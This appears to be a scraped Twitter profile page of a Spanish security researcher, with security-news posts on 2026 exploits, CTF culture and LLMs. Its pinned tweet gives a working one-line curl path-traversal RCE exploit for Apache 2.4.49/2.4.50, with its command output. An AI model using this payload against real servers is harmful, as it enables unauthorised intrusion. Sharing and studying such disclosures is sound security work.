Olivia
Online
☠ Román Medina-Heigl Hernández
@roman_soft
CyberSecurity junkie since 1993. Manager, strategist/advisor and engineer. CTF player (#int3pids). Occasional researcher. Ex-Founder #RootedCon. Always learning
Madrid / Spain
Joined December 2009
690 Following
7.8K Followers
14.5K Posts
Pinned Tweet
RCE exploit both for Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013):
root@CT406:~# curl 'http://192.168.0.191/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo Content-Type: text/plain; echo; id'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
@aramosf @izzb0mb @h_c0n @CCNCERT @therealdreg @NavajaNegra_AB Por último, la @rootedcon en Madrid, si tienes $$$ y quieres ver a mucha gente
@aramosf @izzb0mb @h_c0n @CCNCERT @therealdreg Y la @NavajaNegra_AB en Albacete también muy recomendable (esperemos que solucionen sus problemillas internos pronto)
‼️🚨 Pwn2Own Berlin 2026 just hit a wall. For the first time in 19-years, ZDI rejected dozens of working zero-day RCE submissions because organizers ran out of contest slots.
Rejected hackers are now going public with PoC demos and direct vendor disclosures, breaking Pwn2Own's usual secrecy.
▪️ AI surfaces a massive wave of 0-day RCEs.
▪️ Submissions overwhelm ZDI past max capacity.
▪️ Slots run out. Researchers with working chains get rejected.
▪️ "Revenge disclosures" begin. ← we are here.
Confirmed casualties so far:
▪️ @xchglabs : 86 vulnerabilities prepared (PyTorch, NVIDIA, Linux KVM, Oracle, Docker, Ollama, Chroma, LiteLLM, llama.cpp). All rejected. Now reporting directly to vendors with writeups dropping as patches land.
▪️ @ggwhyp : full-chain Firefox RCE on Windows. Rejected. Publicly demoed (HTML page → cmd.exe → calc.exe). Responsibly disclosed to Mozilla.
▪️ @yunsu_dev : working RCE chain, rejected. Submitting elsewhere.
▪️ @ryotkak : tried to register for 3+ weeks. ZDI confirmed "at maximum capacity, can't add extra contest days." Considered canceling flight and hotel.
▪️ @anzuukino2802 : Claude Code RCE PoC. Rejected.
▪️ @desckimh : 0-day RCEs in Ollama and LM Studio. Rejected.
Reported impact: a community-estimated 150+ researchers tried to register. Accepted contestants are now being warned about collisions. Rejected vulnerabilities going to bug bounty programs may trigger pre-event patches that invalidate the work of those who got in.
ZDI has not publicly addressed the capacity issue. The event still runs May 14-16 in Berlin.
Who to follow
Marc R 
@Seifreed
🌍 Geopolitics & Cyber Intel | 🧠 Reverse Engineering Pro | 🔎 Geostrategy Analyst | 💻 Combatting Cybercrime & APT | 🚀 All tweets are my own!
/RootedCON
@rootedcon
🔥 Cybersecurity Community 🏴☠
Jose Luis Verdeguer
@pepeluxx
Computers engineer. VoIP and security enthusiast. #opensource #kamailio #asterisk #voip #linux #hacking #security #sippts
💥 Introducing "Dirty Frag"
A universal Linux LPE chaining two vulns in xfrm-ESP and RxRPC. A successor class to Dirty Pipe & Copy Fail.
No race, no panic on failure, fully deterministic. ~9 years latent.
Ubuntu / RHEL / Fedora / openSUSE / CentOS / AlmaLinux, and more.
Even if you've applied the "Copy Fail" mitigation, your Linux is still vulnerable to "Dirty Frag". Apply the Dirty Frag mitigation.
Details:
https://t.co/9nqku4svkY
Cpanel RCE (found being exploited in the wild!):
- info
https://t.co/swbaoi9qDB
https://t.co/7WK54a4Gq2
- exploit
https://t.co/mnwlYvZdH4
The Internet is falling down, falling down, falling down
Welcome back to another disaster - this time, an Auth Bypass in cPanel/WHM, tracked as CVE-2026-41940
Enjoy with us..
https://t.co/bOzCPy8iS1
I guess today is a good day to pass OSCP exam more easily 😁🥳. Or rooting that HTB machine still resisting... 🍺
https://t.co/ib5tIG14Wb -> Severe Linux kernel LPE with public and reliable exploit.
"Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distro since 2017."
CopyFail (CVE-2026-31431) in Go. In case you want to get root from a static binary without Python as a dependency.
https://t.co/w5NYM3JBvJ
I too woke up and choose violence today as the fail-copy POC dropped.
Made a clean exploit including fixing the UID post exploitation without rebooting the target server. Smoke those CTF’s in hack the box.
https://t.co/nRiFyXQzRe
https://t.co/ib5tIG14Wb -> Severe Linux kernel LPE with public and reliable exploit.
"Most Linux LPEs need a race window or a kernel-specific offset. Copy Fail is a straight-line logic flaw — it needs neither. The same 732-byte Python script roots every Linux distro since 2017."
This is either brilliant or scary:
Anthropic accidentally leaked the TS source code of Claude Code (which is closed source). Repos sharing the source are taken down with DMCA.
BUT this repo rewrote the code using Python, and so it violates no copyright & cannot be taken down!
🎗️ "Medium-Sized" LLM Burners Coming Soon! 🔥
This Could Make Local HyperToken Generation a Reality. ⚡️ NVIDIA’s worst nightmare? 😱
⚙️ Application-Specific Hardware
Taalas new PCIe ASIC board would burn the entire medium-sized Qwen 3.5-27B LLM straight into silicon 🤯 (already doing it with small models)
Taalos said medium models on ASIC would be available in their lab by Spring '26.
💭Imagine:
🚫 No more loading weights
🚀 ~10,000 Tokens Per Second locally (Llama 3.1 8B already @ 17,000 tps)
💻 Standard PC slot, ultra-low power (10x less) 🔋
🌍 100% offline with no cloud, no GPU farm
💰 Reddit unit cost rumor $300 to $400
🖥️ Imagine HyperToken generation on your desktop.
🤖 AI agents that think at light speed. ⚡️ Are you ready? 👀
🚨 Andrej Karpathy just explained the scariest thing happening in software right now..
someone poisoned a Python package that gets 97 million downloads a month.. and a simple pip install was enough to steal everything on your machine..
SSH keys.. AWS credentials.. crypto wallets.. database passwords.. git credentials.. shell history.. SSL private keys.. everything..
and here's the part that should terrify every developer alive..
the attack was only discovered because the attacker wrote sloppy code.. the malware used so much RAM that it crashed someone's computer.. if the attacker had been better at coding.. nobody would have noticed for weeks..
one developer.. using Cursor with an MCP plugin.. had litellm pulled in as a dependency they didn't even know about.. their machine crashed.. and that crash saved thousands of companies from getting their entire infrastructure stolen..
Karpathy's take is the real wake up call.. every time you install any package you're trusting every single dependency in its tree.. and any one of them could be poisoned..
vibe coding saved us this time.. the attacker vibe coded the attack and it was too sloppy to work quietly.. next time they won't make that mistake.
https://t.co/L1hRl7O7rJ this sums up the CTF vs LLM stuff nicely. Good job @Lina_Hoshino !
the competitive metric (ctftime) is dead/a gimmick at this point...
.. as a retired and washed up competitive ctf player with user id #18 on ctftime it is kinda saddening to see it implode like this. ;-(
I simply don't see any workable solution to bring back fair competitive CTF (with varying difficulty).
you could argue "well anyone can use the LLM's, that levels the playing field". by definition that means
1) you need anti-LLM (difficult) tasks, killing the element of having varying difficulty ("something fun for everyone").
2) teams/entities with cashflow could buy more clankers/compute/access to more expensive models, etc.
3) you're really gonna sit there and watch codex dream up "the house of force" instead of revisiting github dot com slash shellphish slash how2heap all by yourself
and yes I'm aware of all the various "underhanded" CTF tactics teams have employed over the years (where is that picture of the iceberg?); but forcing everyone who wants to compete to start using the ridiculous cheatcode doesn't feel like it addresses/fixes anything..
back in the days when we had to address fairness adjustment in the scoring algo of individual CTFs or ctftime as a whole we'd have a civil discussion (that would sometimes quickly erupt into a full on flamewar) on IRC with the involved parties. I'm afraid the solution is not so simple this time around :)
yo @kyprizel @leetmore @snkdna @hellman1908 I'm curious to hear how you people feel/think about this situation
@dudcom3 What if AI writes the report too? :)
I started playing CTFs in 2022, and LLMs definitely changed the **competitive** CTF scene a lot, especially since mid-2025. I also started using LLMs in late 2025. Yes, those models did one-shot many challenges, but what's the fun of slopping them? I learned absolutely nothing 🥲
Maybe you never used DPL (Default Password List) from Phenoelit. Or perhaps you never attended Ph-Neutral in Berlin. But you must have heard of "FX" from Phenoelit. The legendary old-school hacker (49yo) passed away on 2026-03-01 :-(. RIP & Thank You for your huge contribution.
LaLiga has been ordering Spanish ISPs to block ~3000 IP addresses almost every weekend. Because Cloudflare IPs are shared, this has been doing massive collateral damage to thousands of legitimate websites, apps, and vital services - all at the whim of a private corporation.
No te pierdas el Congreso de Hardware Hacking en castellano (España) completamente GRATUITO. Universidad Rey Juan Carlos (URJC). 18 de abril. Plazas limitadas https://t.co/sH0OEr5TvX
Last Seen Users on Sotwe
Jade Fisher
Seen from Turkey
ماري الصربية 💞✨
😶𝓦😧𝓪😷𝓷😈𝓹🫥𝓪🤔𝓲🫢𝓻🥴𝓮😲𝓲😮💨
Seen from United States
Xoofella
Seen from United States
นัดเยสส สาวอวบ
Seen from Thailand
Hombres
Seen from Argentina
juanmb
Seen from France
سكس عربي اجنبي
Seen from Turkey
Assam night club
Seen from France
🐯KAPLAN KADINI 🐯
Seen from France
Most Popular Users
Elon Musk
@elonmusk
240.2M followers
Barack Obama
@barackobama
119.3M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
108.8M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.2M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.5M followers
KATY PERRY
@katyperry
86.7M followers
Taylor Swift
@taylorswift13
80.5M followers
Lady Gaga
@ladygaga
72.1M followers
Kim Kardashian
@kimkardashian
69.3M followers
YouTube
@youtube
68.6M followers
Virat Kohli
@imvkohli
68.4M followers
Bill Gates
@billgates
63.4M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61M followers
X
@x
60.9M followers
CNN Breaking News
@cnnbrk
59.9M followers